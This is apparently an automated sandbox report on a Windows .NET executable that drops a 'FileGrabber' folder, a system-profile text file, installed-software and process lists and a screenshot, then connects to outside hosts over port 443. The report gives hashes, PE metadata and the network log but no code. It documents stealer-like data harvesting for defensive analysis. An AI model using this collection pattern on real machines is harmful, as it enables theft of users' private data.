SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Roaming\928100\Information.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	652
Entropy (8bit):	4.159650012675235
Encrypted:	false
SSDEEP:	12:pYzZfDaddTeo8YMcnTYVmEt7NuhN5n/A6r:psZfDaddjhYVz7yNO4
MD5:	402A90873413C73DFFA2ED66365AAA96
SHA1:	AB0026E25DC93518CF40820F29FFD978CCF2A9F1
SHA-256:	A7144AE0F0AB42023B8D159B081032E581592453E033B8A211931F2BB45BAD55
SHA-512:	28263884EEFAA8D6B0CBEA26B163B83DECF863D4F74F075E1AE2282DBFA671E00772B52E9A658AD803610E2E6ED79C4059DA3A91E9C63ABA40E9A7D990EA3E67
Malicious:	false
Preview:	==================================================. Operating system : Windows 10 Pro (64 Bit). PC user : 928100/user. ClipBoard : . Launch : C:\Users\user\Desktop\B5U2ccQ8H1.exe. ==================================================. Screen resolution : 1280x1024. Current time : 07/07/2024 08:53:45. HWID : 6968F35D54. ==================================================. CPU : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM : 4094MB. GPU : RU5X7A3C. ==================================================. IP Geolocation : 8.46.123.33 [United States]. Log Date : 07/07/2024 1:05. BSSID : 00:50:56:a7:21:15. ==================================================

C:\Users\user\AppData\Roaming\928100\InstalledSoftware.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.130503875493093
Encrypted:	false
SSDEEP:	6:LO8aRH+39z3q9oH+3GIdKeSuPUOJlgPN3dwbFquqs3o:idRH+5+zd6uPUycUhW
MD5:	2CC99D7F6F68BDCF8752EF80DE256794
SHA1:	0EDB2377502E584BED20FE28001A964F6B8E66D9
SHA-256:	938DE1066B196DEDE78E7B82098436062335D3A9F568C6C65B15AC0E70509AEC
SHA-512:	8C677FF4B66C38F841594D3B8C5F4A9D1BD02E1E59C0E91EFB4BB05C5A8F9F21BDFB93CC3A73439CF9558E367DD9C157348C391904DAED57DCE9CCB17F3CE352
Malicious:	false
Preview:	Google Chrome..Microsoft Edge..Microsoft Edge Update..Microsoft Edge WebView2 Runtime..Java Auto Updater..Java 8 Update 381..Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532..Office 16 Click-to-Run Extensibility Component..

C:\Users\user\AppData\Roaming\928100\Process.txt

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17245
Entropy (8bit):	5.572695951312278
Encrypted:	false
SSDEEP:	96:aFZupZbMUZ22Z5ZF/23E8sgMguhM+fYgMAwZ4q+ZZZZZpt7Z2ZZZWYwZ44OZ+BL3:tbM1MpM4Mnngtr9MxMmEM4Mk
MD5:	A03B65D50848B54340F00D813913ECDD
SHA1:	7DA429672C7EB34BCB38438979D9DCB19ACE780A
SHA-256:	61094CB3F1A1D161602B927A383ADEEFE9958568B584E0F705FC4ABC3BA0D63D
SHA-512:	10575BD8D5FE5DC0C2D6B004513D762A83F004E1B3C9C04C96E203B850FD5ECE0F271127BEEDB665AC6B44E52713F77BBCB7B0FDB7CB5C02FD85AAE9FFDE744D
Malicious:	false
Preview:	NAME: wdOeDzIswQvPYOBGlsS.EXE: C:\Program Files (x86)\IBEKizKUkHhHfGfINiLSiRXqWgYIKGZgPbmNhNloZ\wdOeDzIswQvPYOBGlsS.exe..NAME: svchost.EXE: ..NAME: svchost.EXE: C:\Windows\system32\svchost.exe..NAME: wdOeDzIswQvPYOBGlsS.EXE: C:\Program Files (x86)\IBEKizKUkHhHfGfINiLSiRXqWgYIKGZgPbmNhNloZ\wdOeDzIswQvPYOBGlsS.exe..NAME: wdOeDzIswQvPYOBGlsS.EXE: C:\Program Files (x86)\IBEKizKUkHhHfGfINiLSiRXqWgYIKGZgPbmNhNloZ\wdOeDzIswQvPYOBGlsS.exe..NAME: explorer.EXE: C:\Windows\Explorer.EXE..NAME: wdOeDzIswQvPYOBGlsS.EXE: C:\Program Files (x86)\IBEKizKUkHhHfGfINiLSiRXqWgYIKGZgPbmNhNloZ\wdOeDzIswQvPYOBGlsS.exe..NAME: wdOeDzIswQvPYOBGlsS.EXE: C:\Program Files (x86)\IBEKizKUkHhHfGfINiLSiRXqWgYIKGZgPbmNhNloZ\wdOeDzIswQvPYOBGlsS.exe..NAME: fontdrvhost.EXE: C:\Windows\system32\fontdrvhost.exe..NAME: RuntimeBroker.EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: wdOeDzIswQvPYOBGlsS.EXE: C:\Program Files (x86)\IBEKizKUkHhHfGfINiLSiRXqWgYIKGZgPbmNhNloZ\wdOeDzIswQvPYOBGlsS.exe..NAME: wdOeDzIswQvPYOBGlsS.EXE: C

C:\Users\user\AppData\Roaming\928100\Screen.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	674323
Entropy (8bit):	7.9247800120391965
Encrypted:	false
SSDEEP:	12288:fTKiAb3sWq7Zg9pLCF71sGuHhaLlMD8EwLv4glx+2qYrHRJpLHUK9lO5u:f9Nf7GP2F7m5HhaLnEwLvi2qORJdz98E
MD5:	D01B70CC8D60A439640EA31BCBCFAC77
SHA1:	3DC78987ED7B23C59E98408C16497076915BBCF9
SHA-256:	C5D4B3C9B646B754B90C84172C0C8BD1E4B7A30AFB53F10D790FA003EDAAFEC6
SHA-512:	C1294251B5387627A3C4646F5B82C0F4E05D022E22BFCBF8A384DA6F53BA24B1237717C57B99B20930EBFCC02973BB95F9F1219D680B378E809A32EB61FAA91D
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g..Wu...]'.w..q...~...?.;.v...j......%$.@.l....d...`..Y...@B.... ....B.#.I6...g..k..w...H@i.g...k.]u....w4:.{.b....=..;..2./g...5..~.0z]..[l....k.;..[+1~...0..k..3#K.^f..;..}...."..y..rs.^.w.b..9.?....O.._..c],.L.1..K.3Xz......5YzQ....O.1.hF/..Xz.....m..6.....)...+...\|y....Ks..0~...f../N...[..g~q..g.2...K...O+gn.mO.y..S.0?O.iC..t.......7...?;.m.K....'...m.K./u.`...L....l.\.^e\z.g...9K..Te.#{.........OW.....5..~.d.Z.z[`.a.X.!....XE.G.g}..=..n.C>.m?......U..t}...5...oo.Q.5g...h7zP...\|~.o+q.,...3z..Y...g..6...\[q....&....x..r....=...s.Y.C..8......k...(5...Y.V>...tK.^.O....\|e.......J.P.....fW.w.+u.;.+......m..IW.1...1....'_..8..;.z.I%w........v.v].....2...;O..O.py7>..:n._.>'^VY......L`.;O).U.....u;N...........].g.Y~........m?...\9...TX...._..\|...1..l;..eMM9s.......[:..{t...>.-...:.yl...b.#...c.9.8.....Y.e.uL.st..U.....#K..t.(.[.......c...b=..}/..]

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.789957084335953
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	B5U2ccQ8H1.exe
File size:	328'192 bytes
MD5:	86108d3bcc19fe774cc81b71494d31f9
SHA1:	d936ce0c2f3ddc35f972c3a87fcaeb036412e009
SHA256:	9a25faeade01978fd39daedd1b8fea6f4b5957a001a7227141b2ee7d714b421b
SHA512:	151411bf7603856b39169b40cd7b7c68eff1f3f6ccba27d6767384b390e688287c6823aa3f542eeeded92c0e5b584ed429948b99d3c8e22c2b626fdd6bf849f0
SSDEEP:	6144:Cm/Q1Q5Ng68j/svmHC40+XIzFUygWK0tWrcBOvl:Cm/Q6P8j/svm1TXI5tZB
TLSH:	D06439043BE98A18F1BF9BBAD4B15120C771B413A93EDB4F0A9510EA2D72391DD41FA7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.b.........."...0.................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x45151e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62B03EF4 [Mon Jun 20 09:33:40 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x514cc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x616	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4f524	0x4f600	320e1045497ee1423ecd46dd6bd0d8a8	False	0.4030757874015748	data	5.808378966762242	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x616	0x800	f5d9232ceb503724a06bc5641b524d3b	False	0.3330078125	data	3.5016788786614454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54000	0xc	0x200	7b6d00e1ed5f44d68f1c7a521df43254	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x520a0	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data			0.4107929515418502
RT_MANIFEST	0x5242c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 7, 2024 07:05:57.034801006 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.034832954 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.034969091 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.049715042 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.049758911 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.049823046 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.051594973 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.051609993 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.051686049 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.051714897 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.051769972 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.051909924 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.051930904 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.052082062 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.052104950 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.560949087 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.561083078 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.568053961 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.568063974 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.568337917 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.609950066 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.627213955 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.668504953 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.690640926 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.690748930 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.690779924 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.690855026 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.693664074 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.693669081 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.693947077 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.695458889 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.702491045 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.702572107 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.702600956 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.702650070 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.703886032 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.703895092 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.704137087 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.705679893 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.736378908 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.736521959 CEST	443	49730	188.114.97.3	192.168.2.4
Jul 7, 2024 07:05:57.736588001 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.739639997 CEST	49730	443	192.168.2.4	188.114.97.3
Jul 7, 2024 07:05:57.740509987 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.744319916 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.744376898 CEST	443	49731	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.744376898 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.744401932 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.744435072 CEST	49731	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.744441032 CEST	443	49732	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.744491100 CEST	49732	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.758280993 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.758310080 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.758373976 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.758567095 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.758579969 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.765723944 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.765732050 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:57.765799999 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.767680883 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:57.767690897 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.396231890 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.396328926 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.396356106 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.396404982 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.419665098 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.419754982 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.419760942 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.420828104 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.449800968 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.449807882 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.449858904 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.449862957 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.450124025 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.450171947 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.453272104 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.500509024 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.501647949 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.550237894 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.592500925 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.964786053 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.964853048 CEST	443	49733	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.964899063 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.967474937 CEST	49733	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.968776941 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.968832970 CEST	443	49734	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.968880892 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.969165087 CEST	49734	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.984087944 CEST	49735	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.984127998 CEST	443	49735	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:58.984184027 CEST	49735	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.984455109 CEST	49735	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:58.984469891 CEST	443	49735	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:59.090486050 CEST	49736	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:59.090519905 CEST	443	49736	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:59.090578079 CEST	49736	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:59.090785027 CEST	49736	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:59.090800047 CEST	443	49736	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:59.641053915 CEST	443	49735	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:59.643673897 CEST	49735	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:59.643698931 CEST	443	49735	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:59.743383884 CEST	443	49736	162.125.66.15	192.168.2.4
Jul 7, 2024 07:05:59.744802952 CEST	49736	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:05:59.744822025 CEST	443	49736	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.205338955 CEST	443	49735	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.205394030 CEST	443	49735	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.205672979 CEST	49735	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.206006050 CEST	49735	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.234914064 CEST	49737	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.234957933 CEST	443	49737	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.235032082 CEST	49737	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.235302925 CEST	49737	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.235316038 CEST	443	49737	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.331779003 CEST	443	49736	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.331851006 CEST	443	49736	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.331976891 CEST	49736	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.332707882 CEST	49736	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.929209948 CEST	443	49737	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:00.934365034 CEST	49737	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:00.934411049 CEST	443	49737	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:01.555758953 CEST	443	49737	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:01.555821896 CEST	443	49737	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:01.555880070 CEST	49737	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:01.556288958 CEST	49737	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:01.573967934 CEST	49738	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:01.574002981 CEST	443	49738	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:01.574065924 CEST	49738	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:01.574402094 CEST	49738	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:01.574417114 CEST	443	49738	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:02.221981049 CEST	443	49738	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:02.223620892 CEST	49738	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:02.223659992 CEST	443	49738	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:02.781605005 CEST	443	49738	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:02.781661034 CEST	443	49738	162.125.66.15	192.168.2.4
Jul 7, 2024 07:06:02.782049894 CEST	49738	443	192.168.2.4	162.125.66.15
Jul 7, 2024 07:06:02.782354116 CEST	49738	443	192.168.2.4	162.125.66.15
